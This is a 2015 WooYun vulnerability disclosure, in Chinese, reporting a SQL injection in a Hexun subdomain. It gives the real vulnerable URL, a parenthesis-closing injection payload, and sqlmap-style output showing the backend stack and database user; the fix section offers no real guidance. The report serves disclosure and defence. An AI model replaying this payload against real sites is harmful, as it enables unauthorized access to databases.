当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092602

漏洞标题:和讯网分站注射再来一发

相关厂商:和讯网

漏洞作者: greg.wu

提交时间:2015-01-19 10:10

修复时间:2015-03-05 10:12

公开时间:2015-03-05 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-29: 细节向核心白帽子及相关领域专家公开
2015-02-08: 细节向普通白帽子公开
2015-02-18: 细节向实习白帽子公开
2015-03-05: 细节向公众公开

简要描述:

发现和讯网最近给分高了,挖洞的积极性都提升了,再射一发~

详细说明:

注入点:
http://tg.hexun.com/ajaxresponse/response2.aspx?func=bindteacherlist&userids=%2716799401%27,%2725144711%27,%2725144761%27,%2725147204%27,%2725178838%27,%2725178866%27,%2725179068%27,%2725184126%27,%2725185826%27&_=1421384235342
目测是in (xxx)类型的注射,所以用括号闭合就好了
http://tg.hexun.com/ajaxresponse/response2.aspx?func=bindteacherlist&userids=%2716799401%27) and (1=1&_=1421384235342

漏洞证明:

没必要上图了,直接上数据证明一下就好
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2005
[23:01:31] [INFO] fetching current user
[23:01:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:01:31] [INFO] retrieved: dbreader
current user: 'dbreader'

修复方案:

你懂的

版权声明:转载请注明来源 greg.wu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-19 10:11

厂商回复:

谢谢提醒,处理中。

最新状态:

暂无